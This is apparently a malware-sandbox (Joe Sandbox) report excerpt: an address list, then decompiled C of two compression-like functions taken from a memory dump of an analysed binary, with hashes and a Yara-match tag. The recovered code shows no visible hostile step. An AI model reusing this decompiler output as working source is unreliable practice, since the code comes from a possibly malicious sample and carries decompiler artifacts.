                  0x0040506f
                  0x00405073
                  0x00405076
                  0x00405079
                  0x004050c6
                  0x004050cb
                  0x004050d3
                  0x004050d6
                  0x004050d8
                  0x004050dd
                  0x004050e0
                  0x004050e3
                  0x004050eb
                  0x004050eb
                  0x004050ee
                  0x004050f1
                  0x004050f1
                  0x004050f4
                  0x004050f7
                  0x004050fa
                  0x00405143
                  0x0040514b
                  0x0040514b
                  0x0040514e
                  0x00000000
                  0x004050fc
                  0x004050fc
                  0x004050ff
                  0x004050ff
                  0x00405102
                  0x00405105
                  0x00405105
                  0x00405112
                  0x00405117
                  0x0040511b
                  0x0040511e
                  0x00405137
                  0x00405120
                  0x00405123
                  0x00405126
                  0x0040512c
                  0x00405132
                  0x00405132
                  0x0040513a
                  0x0040513a
                  0x0040513a
                  0x0040513d
                  0x00405140
                  0x00000000
                  0x00405140
                  0x004050fa
                  0x00405085
                  0x00405088
                  0x0040508e
                  0x00000000
                  0x00000000
                  0x0040509a
                  0x0040509d
                  0x004050a2
                  0x004050a2
                  0x004050a7
                  0x004050aa
                  0x004050aa
                  0x004050ad
                  0x004050af
                  0x004050b1
                  0x004050b1
                  0x004050b9
                  0x00405156
                  0x00405156
                  0x00405159
                  0x0040515a
                  0x0040515a
                  0x00405164
                  0x00405167
                  0x00405167
                  0x00000000
                  0x00405167
                  0x00405014
                  0x00405017
                  0x00405a9d
                  0x00405aa0
                  0x00405aa0
                  0x00405aa3
                  0x00000000
                  0x00405aa3
                  0x00000000
                  0x00405017
                  0x00404fbf
                  0x00404fc2
                  0x00404fc6
                  0x00404fcd
                  0x00404fce
                  0x00404fce
                  0x00404fd4
                  0x00404fd4
                  0x00000000
                  0x00404fd4
                  0x00404e9e
                  0x00404ea1
                  0x00404ecb
                  0x00404ecb
                  0x00404ed4
                  0x00404ed7
                  0x00404eda
                  0x00404edd
                  0x00404ee0
                  0x00404ee3
                  0x00404eed
                  0x00000000
                  0x00404eed
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6
                  0x00404ea6
                  0x00404ea9
                  0x00000000
                  0x00000000
                  0x00404eb4
                  0x00404eb6
                  0x00404eb7
                  0x00404eba
                  0x00404ebd
                  0x00404ec0
                  0x00404ec3
                  0x00000000
                  0x00000000
                  0x00404ec5
                  0x00404ec8
                  0x00000000
                  0x00404ec8
                  0x00405a92
                  0x00000000
                  0x00405a92
                  0x00404e06
                  0x00404e08
                  0x00404e0b
                  0x00404e14
                  0x00404e1e
                  0x00404e24
                  0x00404e2b
                  0x00404e32
                  0x00404e37
                  0x00404e49
                  0x00404e4a
                  0x00404e4a
                  0x00404e4c
                  0x00404e54
                  0x00404e5a
                  0x00404e60
                  0x00000000
                  0x00404e60
                  0x00404d1e
                  0x00404d1e
                  0x00404d1f
                  0x00000000
                  0x00000000
                  0x00404d26
                  0x00404d26
                  0x00404d27
                  0x00405c30
                  0x00000000
                  0x00405c30
                  0x00404d2d
                  0x00404d2d
                  0x00404d2e
                  0x00405c63
                  0x00000000
                  0x00405c63
                  0x00404d34
                  0x00404d34
                  0x00404d37
                  0x00000000
                  0x00000000
                  0x00404d3d
                  0x00404d3d
                  0x00404d3e
                  0x00405a3f
                  0x00000000
                  0x00405a3f
                  0x00404d44
                  0x00404d45
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404d4b
                  0x00404ccf
                  0x00000000
                  0x00000000
                  0x00404cd5
                  0x00404cd5
                  0x00404cd8
                  0x00000000
                  0x00000000
                  0x00404cde
                  0x00404cde
                  0x00404cdf
                  0x00000000
                  0x00000000
                  0x00404ce5
                  0x00404ce5
                  0x00404ce6
                  0x00000000
                  0x00000000
                  0x00404cec
                  0x00404cec
                  0x00404cef
                  0x00000000
                  0x00000000
                  0x00404cf6
                  0x00404cf6
                  0x00404cf7
                  0x00000000
                  0x00000000
                  0x00404cfd
                  0x00404cfd
                  0x00404cfe
                  0x00000000
                  0x00000000
                  0x00404d04
                  0x00404d05
                  0x00000000
                  0x00000000
                  0x00404d0b
                  0x00404d0b
                  0x00404d0e
                  0x00000000
                  0x00404d0e
                  0x00404b80
                  0x00405604
                  0x00000000
                  0x00405604
                  0x00404b86
                  0x00404b89
                  0x00404c8c
                  0x00404c8c
                  0x00404c8f
                  0x00000000
                  0x00000000
                  0x00404c95
                  0x00404c95
                  0x00404c98
                  0x00000000
                  0x00000000
                  0x00404c9f
                  0x00404c9f
                  0x00404ca0
                  0x00000000
                  0x00000000
                  0x00404ca6
                  0x00404ca6
                  0x00404ca7
                  0x00000000
                  0x00000000
                  0x00404cad
                  0x00404cad
                  0x00404cae
                  0x00000000
                  0x00000000
                  0x00404cb4
                  0x00404cb4
                  0x00404cb7
                  0x00000000
                  0x00000000
                  0x00404cbe
                  0x00404cbf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404cc5
                  0x00404b8f
                  0x00000000
                  0x00000000
                  0x00404b98
                  0x00000000
                  0x00000000
                  0x00404b9e
                  0x00000000
                  0x00404ba5
                  0x00404ba8
                  0x00404baa
                  0x00404bad
                  0x00404baf
                  0x00404bb2
                  0x00404bb5
                  0x00404bb8
                  0x00404bbb
                  0x00404bbe
                  0x00404bc1
                  0x00404bc4
                  0x00404bca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404bd0
                  0x00404bd0
                  0x00404bd3
                  0x00404bd7
                  0x00404be6
                  0x00404be7
                  0x00000000
                  0x00404be7
                  0x00404bd9
                  0x00404bdc
                  0x00000000
                  0x00000000
                  0x00404bec
                  0x00404bef
                  0x00404bef
                  0x00404bf1
                  0x00404c0a
                  0x00404c0e
                  0x00404c11
                  0x00404c14
                  0x00404c1c
                  0x00404c1f
                  0x00404c24
                  0x00404c2e
                  0x00404c30
                  0x00404c47
                  0x00404c47
                  0x00404c4a
                  0x00404c4c
                  0x00404c4c
                  0x00404c50
                  0x00404c53
                  0x00404c7c
                  0x00404c7c
                  0x00404c7f
                  0x00404c81
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c87
                  0x00404c5b
                  0x00404c5d
                  0x00404c63
                  0x00404c74
                  0x00404c74
                  0x00404c77
                  0x00404c77
                  0x00404c77
                  0x00404c79
                  0x00000000
                  0x00404c79
                  0x00404c69
                  0x00404c6b
                  0x00404c6c
                  0x00404c6e
                  0x00000000
                  0x00000000
                  0x00404c70
                  0x00000000
                  0x00404c70
                  0x00404c32
                  0x00404c36
                  0x00000000
                  0x00000000
                  0x00404c3c
                  0x00404c3e
                  0x00000000
                  0x00000000
                  0x00404c40
                  0x00404c43
                  0x00000000
                  0x00404c43
                  0x00404bf3
                  0x00404bf5
                  0x00404bf6
                  0x00404bf9
                  0x00404bfb
                  0x00404bfc
                  0x00404c00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a5d
                  0x00000000
                  0x00000000
                  0x00404b9e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Similarity
                  • API ID: memset$_memset
                  • String ID: $0HCw
                  • API String ID: 805054810-431550929
                  • Opcode ID: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction ID: 0f27d5521e96fbc1980188426f25ed571c9babf91149ddb257576a03cfef0b11
                  • Opcode Fuzzy Hash: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction Fuzzy Hash: 59D25D71E0461ADBDB18CFA9C9906AEBBB1FF49300F14416AD955F7380D738AA41CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 88%
                  			E00402F82(void* __ecx) {
                  				int _v8;
                  				int _v12;
                  				signed int _v16;
                  				signed char _v20;
                  				signed char _v24;
                  				int _v28;
                  				int _v32;
                  				intOrPtr _v36;
                  				char _v356;
                  				void _v676;
                  				int _t269;
                  				signed char _t283;
                  				signed char _t287;
                  				signed char _t291;
                  				signed int _t294;
                  				signed char _t297;
                  				signed int _t298;
                  				signed char _t301;
                  				signed char _t310;
                  				int _t336;
                  				int _t337;
                  				signed char _t341;
                  				signed char _t342;
                  				signed char _t343;
                  				void* _t344;
                  				void* _t345;
                  				signed char _t346;
                  				signed char _t347;
                  				signed char _t348;
                  				signed char* _t349;
                  				signed char* _t350;
                  				signed char _t351;
                  				signed char* _t352;
                  				signed char* _t353;
                  				signed char* _t354;
                  				signed char* _t355;
                  				signed char* _t356;
                  				intOrPtr _t358;
                  				intOrPtr _t360;
                  				char _t361;
                  				intOrPtr _t362;
                  				char _t364;
                  				intOrPtr _t366;
                  				intOrPtr _t368;
                  				void* _t374;
                  				void* _t375;
                  				signed int _t377;
                  				signed char _t379;
                  				int _t381;
                  				void* _t383;
                  				signed int _t385;
                  				void* _t387;
                  				void* _t388;
                  				signed int _t389;
                  				void* _t390;
                  				void* _t391;
                  				void* _t392;
                  				void* _t393;
                  
                  				_v20 = 0xff;
                  				_t383 = __ecx;
                  				 *((short*)(__ecx + 0x8392)) = 1;
                  				E00402D85(__ecx, 0, 0x120, 0xf, 0);
                  				E00402D85(__ecx, 1, 0x20, 0xf, 0);
                  				_t392 = _t391 + 0x18;
                  				_t336 = 0x11e;
                  				while( *((char*)(_t383 + _t336 + 0x8f11)) == 0) {
                  					_t336 = _t336 - 1;
                  					if(_t336 > 0x101) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_v16 = _t336;
                  				_t269 = 0x1e;
                  				while( *((char*)(_t383 + _t269 + 0x9031)) == 0) {
                  					_t269 = _t269 - 1;
                  					if(_t269 > 1) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_v32 = _t269;
                  				memcpy( &_v676, _t383 + 0x8f12, _t336);
                  				memcpy( &_v676 + _t336, _t383 + 0x9032, _v32);
                  				_t337 = 0;
                  				_v36 = _v32 + _t336;
                  				_v12 = 0;
                  				_v8 = 0;
                  				memset(_t383 + 0x8612, 0, 0x26);
                  				_t393 = _t392 + 0x24;
                  				_v28 = 0;
                  				if(_v36 > 0) {
                  					_t310 = _v20;
                  					do {
                  						_t379 =  *((intOrPtr*)(_t390 + _v28 - 0x2a0));
                  						_v24 = _t379;
                  						if(_t379 != 0) {
                  							_t358 = _v12;
                  							if(_t358 != 0) {
                  								if(_t358 >= 3) {
                  									if(_t358 > 0xa) {
                  										 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  										_t364 = _t358 - 0xb;
                  										 *(_t390 + _t337 - 0x160) = 0x12;
                  									} else {
                  										 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
                  										_t364 = _t358 - 3;
                  										 *(_t390 + _t337 - 0x160) = 0x11;
                  									}
                  									 *((char*)(_t390 + _t337 - 0x15f)) = _t364;
                  									_t337 = _t337 + 2;
                  								} else {
                  									 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t358;
                  									E0040FDD0( &_v356 + _t337, 0, _t358);
                  									_t393 = _t393 + 0xc;
                  									_t379 = _v24;
                  									_t337 = _t337 + _v12;
                  								}
                  								_t310 = _v20;
                  								_v12 = 0;
                  							}
                  							if(_t379 == _t310) {
                  								_t381 = _v8 + 1;
                  								_v8 = _t381;
                  								if(_t381 == 6) {
                  									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  									_t381 = 0;
                  									 *(_t390 + _t337 - 0x160) = 0x310;
                  									_v8 = 0;
                  									goto L33;
                  								}
                  							} else {
                  								_t362 = _v8;
                  								if(_t362 != 0) {
                  									if(_t362 >= 3) {
                  										 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  										 *(_t390 + _t337 - 0x160) = 0x10;
                  										 *((char*)(_t390 + _t337 - 0x15f)) = _t362 - 3;
                  										_t337 = _t337 + 2;
                  									} else {
                  										 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t362;
                  										E0040FDD0( &_v356 + _t337, _v20, _t362);
                  										_t379 = _v24;
                  										_t393 = _t393 + 0xc;
                  										_t337 = _t337 + _v8;
                  									}
                  									_v8 = 0;
                  								}
                  								 *(_t390 + _t337 - 0x160) = _t379;
                  								_t381 = _v8;
                  								 *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) =  *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) + 1;
                  								_t337 = _t337 + 1;
                  							}
                  						} else {
                  							_t366 = _v8;
                  							if(_t366 != 0) {
                  								if(_t366 >= 3) {
                  									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  									 *(_t390 + _t337 - 0x160) = 0x10;
                  									 *((char*)(_t390 + _t337 - 0x15f)) = _t366 - 3;
                  									_t337 = _t337 + 2;
                  								} else {
                  									 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t366;
                  									E0040FDD0( &_v356 + _t337, _v20, _t366);
                  									_t393 = _t393 + 0xc;
                  									_t337 = _t337 + _v8;
                  								}
                  								_v8 = 0;
                  							}
                  							_t381 = _v8;
                  							_t368 = _v12 + 1;
                  							_v12 = _t368;
                  							if(_t368 == 0x8a) {
                  								 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  								 *(_t390 + _t337 - 0x160) = 0x7f12;
                  								_v12 = 0;
                  								L33:
                  								_t337 = _t337 + 2;
                  							}
                  						}
                  						_v28 = _v28 + 1;
                  						_t310 = _v24;
                  						_t360 = _v12;
                  						_v20 = _t310;
                  					} while (_v28 < _v36);
                  					if(_t381 == 0) {
                  						if(_t360 != 0) {
                  							if(_t360 >= 3) {
                  								if(_t360 > 0xa) {
                  									 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  									_t361 = _t360 - 0xb;
                  									 *(_t390 + _t337 - 0x160) = 0x12;
                  								} else {
                  									 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
                  									_t361 = _t360 - 3;
                  									 *(_t390 + _t337 - 0x160) = 0x11;
                  								}
                  								 *((char*)(_t390 + _t337 - 0x15f)) = _t361;
                  								goto L46;
                  							} else {
                  								 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t360;
                  								E0040FDD0( &_v356 + _t337, 0, _t360);
                  								_t393 = _t393 + 0xc;
                  								_t337 = _t337 + _v12;
                  							}
                  						}
                  					} else {
                  						if(_t381 >= 3) {
                  							 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  							 *(_t390 + _t337 - 0x160) = 0x10;
                  							 *((char*)(_t390 + _t337 - 0x15f)) = _t381 - 3;
                  							L46:
                  							_t337 = _t337 + 2;
                  						} else {
                  							 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t381;
                  							E0040FDD0( &_v356 + _t337, _v24, _t381);
                  							_t393 = _t393 + 0xc;
                  							_t337 = _t337 + _v8;
                  						}
                  					}
                  				}
                  				_push(0);
                  				_push(7);
                  				_push(0x13);
                  				_t385 = 2;
                  				E00402D85(_t383, _t385);
                  				_t341 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t385 << _t341;
                  				_t387 = 0xfffffff8;
                  				_t283 = _t341 + 2;
                  				_t374 = 8;
                  				 *(_t383 + 0x44) = _t283;
                  				if(_t283 >= _t374) {
                  					do {
                  						_t356 =  *(_t383 + 0x30);
                  						if(_t356 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t356 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t342 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v16 + 0xfffffeff << _t342;
                  				_t287 = _t342 + 5;
                  				 *(_t383 + 0x44) = _t287;
                  				if(_t287 >= _t374) {
                  					do {
                  						_t355 =  *(_t383 + 0x30);
                  						if(_t355 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t355 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t343 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v32 - 0x00000001 << _t343;
                  				_t291 = _t343 + 5;
                  				 *(_t383 + 0x44) = _t291;
                  				if(_t291 >= _t374) {
                  					do {
                  						_t354 =  *(_t383 + 0x30);
                  						if(_t354 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t354 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t344 = 0x12;
                  				while(1) {
                  					_t186 = _t344 + 0x4111a0; // 0xf
                  					if( *((char*)(( *_t186 & 0x000000ff) + _t383 + 0x9152)) != 0) {
                  						break;
                  					}
                  					_t344 = _t344 - 1;
                  					if(_t344 >= 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_t189 = _t344 + 1; // 0x12
                  				_t345 = 4;
                  				_t294 =  <  ? _t345 : _t189;
                  				_t346 =  *(_t383 + 0x44);
                  				_v16 = _t294;
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t294 + 0xfffffffc << _t346;
                  				_t297 = _t346 + 4;
                  				 *(_t383 + 0x44) = _t297;
                  				if(_t297 >= _t374) {
                  					do {
                  						_t353 =  *(_t383 + 0x30);
                  						if(_t353 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							_t297 =  *(_t383 + 0x48);
                  							 *_t353 = _t297;
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t388 = 0;
                  				_t375 = 0;
                  				if(_v16 > 0) {
                  					_t389 = _v16;
                  					do {
                  						_t208 = _t375 + 0x4111a0; // 0x121110
                  						_t351 =  *(_t383 + 0x44);
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(( *_t208 & 0x000000ff) + _t383 + 0x9152) & 0x000000ff) << _t351;
                  						_t297 = _t351 + 3;
                  						 *(_t383 + 0x44) = _t297;
                  						if(_t297 >= 8) {
                  							do {
                  								_t352 =  *(_t383 + 0x30);
                  								if(_t352 <  *((intOrPtr*)(_t383 + 0x34))) {
                  									_t297 =  *(_t383 + 0x48);
                  									 *_t352 = _t297;
                  									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  								}
                  								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  							} while ( *(_t383 + 0x44) >= 8);
                  						}
                  						_t375 = _t375 + 1;
                  					} while (_t375 < _t389);
                  					_t388 = 0;
                  				}
                  				if(_t337 != 0) {
                  					do {
                  						_t298 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
                  						_t388 = _t388 + 1;
                  						_t347 =  *(_t383 + 0x44);
                  						_v16 = _t298;
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(_t383 + 0x8cd2 + _t298 * 2) & 0x0000ffff) << _t347;
                  						_t301 = _t347 + ( *(_t383 + _t298 + 0x9152) & 0x000000ff);
                  						 *(_t383 + 0x44) = _t301;
                  						if(_t301 >= 8) {
                  							do {
                  								_t350 =  *(_t383 + 0x30);
                  								if(_t350 <  *((intOrPtr*)(_t383 + 0x34))) {
                  									 *_t350 =  *(_t383 + 0x48);
                  									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  								}
                  								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  							} while ( *(_t383 + 0x44) >= 8);
                  						}
                  						_t297 = _v16;
                  						if(_t297 >= 0x10) {
                  							_t377 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
                  							_t388 = _t388 + 1;
                  							_t348 =  *(_t383 + 0x44);
                  							_t297 = ( &__imp__IsProcessorFeaturePresent)[_t297] + _t348;
                  							 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t377 << _t348;
                  							 *(_t383 + 0x44) = _t297;
                  							if(_t297 >= 8) {
                  								do {
                  									_t349 =  *(_t383 + 0x30);
                  									if(_t349 <  *((intOrPtr*)(_t383 + 0x34))) {
                  										_t297 =  *(_t383 + 0x48);
                  										 *_t349 = _t297;
                  										 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  									}
                  									 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  									 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  								} while ( *(_t383 + 0x44) >= 8);
                  							}
                  						}
                  					} while (_t388 < _t337);
                  				}
                  				return _t297;
                  			}






























































                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memset$memcpy
                  • String ID: 0HCw
                  • API String ID: 1551266493-3134391196
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ca43e400cc7215004ac780a32a62955417f8f7f80a22650c2bf1bec3b8deea9e
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 46024830900666EFCB16CF68C9C56EABF74FF45301F14017AC855A7782C73AAA25CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 79%
                  			E004037A9(intOrPtr* __ecx, intOrPtr __edx) {
                  				unsigned int _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				intOrPtr _t271;
                  				signed char _t279;
                  				intOrPtr _t283;
                  				intOrPtr _t291;
                  				signed int _t299;
                  				signed int _t300;
                  				signed char _t303;
                  				signed char _t306;
                  				signed char _t315;
                  				signed char _t324;
                  				signed char _t327;
                  				signed char _t333;
                  				signed int _t342;
                  				signed char _t344;
                  				signed char _t348;
                  				intOrPtr _t357;
                  				signed int _t358;
                  				void* _t359;
                  				void* _t362;
                  				intOrPtr _t363;
                  				signed char _t366;
                  				intOrPtr _t367;
                  				signed char _t370;
                  				signed char _t371;
                  				signed char _t372;
                  				char* _t373;
                  				char* _t374;
                  				char* _t375;
                  				signed char _t376;
                  				char* _t377;
                  				char* _t378;
                  				signed char _t382;
                  				signed char _t383;
                  				signed char _t384;
                  				char* _t385;
                  				char* _t386;
                  				char* _t387;
                  				char* _t388;
                  				char* _t393;
                  				signed char _t394;
                  				signed char _t395;
                  				char* _t396;
                  				char* _t397;
                  				intOrPtr _t398;
                  				int _t400;
                  				intOrPtr _t401;
                  				void* _t402;
                  				signed int _t403;
                  				signed int _t404;
                  				void* _t406;
                  				void* _t410;
                  				intOrPtr _t411;
                  				int _t414;
                  				void* _t415;
                  				signed char _t416;
                  				intOrPtr* _t417;
                  
                  				_t417 = __ecx;
                  				_t357 = __edx;
                  				_v20 = __edx;
                  				_v16 = 0;
                  				if(( *(__ecx + 8) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
                  					_t400 = 0;
                  				} else {
                  					_t400 = 1;
                  				}
                  				if( *_t417 != 0) {
                  					L7:
                  					_t271 = _t417 + 0x39272;
                  					goto L8;
                  				} else {
                  					_t398 =  *((intOrPtr*)(_t417 + 0x8c));
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t398 < 0x14ccc) {
                  						goto L7;
                  					} else {
                  						_t271 =  *((intOrPtr*)(_t417 + 0x74)) + _t398;
                  						L8:
                  						 *((intOrPtr*)(_t417 + 0x30)) = _t271;
                  						_v12 = _t271;
                  						 *((intOrPtr*)(_t417 + 0x34)) = _t271 + 0x14cbc;
                  						 *(_t417 + 0x58) = 0;
                  						 *((intOrPtr*)(_t417 + 0x5c)) = 0;
                  						 *( *(_t417 + 0x2c)) =  *( *(_t417 + 0x2c)) >>  *(_t417 + 0x38);
                  						_t410 = 8;
                  						 *((intOrPtr*)(_t417 + 0x28)) =  *((intOrPtr*)(_t417 + 0x28)) - (0 |  *(_t417 + 0x38) == _t410);
                  						if(( *(_t417 + 8) & 0x00001000) == 0 ||  *((intOrPtr*)(_t417 + 0x64)) != 0) {
                  							L18:
                  							_t366 =  *(_t417 + 0x44);
                  							 *(_t417 + 0x48) =  *(_t417 + 0x48) | (0 | _t357 == 0x00000004) << _t366;
                  							_t64 = _t366 + 1; // 0xf9
                  							_t279 = _t64;
                  							 *(_t417 + 0x44) = _t279;
                  							if(_t279 < _t410) {
                  								L22:
                  								_t411 =  *((intOrPtr*)(_t417 + 0x30));
                  								_t358 =  *(_t417 + 0x44);
                  								_v8 =  *(_t417 + 0x48);
                  								if(_t400 != 0) {
                  									_t401 = _v16;
                  									L47:
                  									if( *((intOrPtr*)(_t417 + 0x1c)) -  *((intOrPtr*)(_t417 + 0x40)) >  *((intOrPtr*)(_t417 + 0x24))) {
                  										L28:
                  										if(_t401 == 0) {
                  											_t87 =  &_v8; // 0x40473a
                  											 *(_t417 + 0x48) =  *_t87;
                  											 *((intOrPtr*)(_t417 + 0x30)) = _t411;
                  											 *(_t417 + 0x44) = _t358;
                  											E0040378E(_t417, _t401 + 1);
                  										}
                  										_t359 = 2;
                  										L31:
                  										_t283 = _v20;
                  										if(_t283 == 0) {
                  											L84:
                  											memset(_t417 + 0x8192, 0, 0x240);
                  											memset(_t417 + 0x83d2, 0, 0x40);
                  											 *(_t417 + 0x38) = 8;
                  											 *((intOrPtr*)(_t417 + 0x28)) = _t417 + 0x9273;
                  											 *(_t417 + 0x2c) = _t417 + 0x9272;
                  											 *((intOrPtr*)(_t417 + 0x40)) =  *((intOrPtr*)(_t417 + 0x40)) +  *(_t417 + 0x3c);
                  											 *((intOrPtr*)(_t417 + 0x64)) =  *((intOrPtr*)(_t417 + 0x64)) + 1;
                  											_t291 = _v12;
                  											 *(_t417 + 0x3c) = 0;
                  											_t362 =  *((intOrPtr*)(_t417 + 0x30)) - _t291;
                  											if(_t362 == 0) {
                  												L92:
                  												return  *((intOrPtr*)(_t417 + 0x5c));
                  											}
                  											if( *_t417 == 0) {
                  												_t402 = _t417 + 0x39272;
                  												if(_t291 != _t402) {
                  													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t362;
                  												} else {
                  													_t367 =  *((intOrPtr*)(_t417 + 0x8c));
                  													_t414 =  <  ? _t362 :  *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t367;
                  													memcpy( *((intOrPtr*)(_t417 + 0x74)) + _t367, _t402, _t414);
                  													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t414;
                  													_t363 = _t362 - _t414;
                  													if(_t363 != 0) {
                  														 *(_t417 + 0x58) = _t414;
                  														 *((intOrPtr*)(_t417 + 0x5c)) = _t363;
                  													}
                  												}
                  												goto L92;
                  											}
                  											 *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x78)))) =  *((intOrPtr*)(_t417 + 0x84)) -  *((intOrPtr*)(_t417 + 0x70));
                  											_t299 =  *_t417(_t417 + 0x39272, _t362,  *((intOrPtr*)(_t417 + 4)));
                  											if(_t299 != 0) {
                  												goto L92;
                  											}
                  											_t300 = _t299 | 0xffffffff;
                  											 *(_t417 + 0x6c) = _t300;
                  											return _t300;
                  										}
                  										_t370 =  *(_t417 + 0x44);
                  										_t415 = 4;
                  										if(_t283 != _t415) {
                  											_t403 = 0;
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
                  											_t303 = _t370 + 3;
                  											 *(_t417 + 0x44) = _t303;
                  											if(_t303 < 8) {
                  												L74:
                  												_t371 =  *(_t417 + 0x44);
                  												if(_t371 == 0) {
                  													do {
                  														L79:
                  														_t372 =  *(_t417 + 0x44);
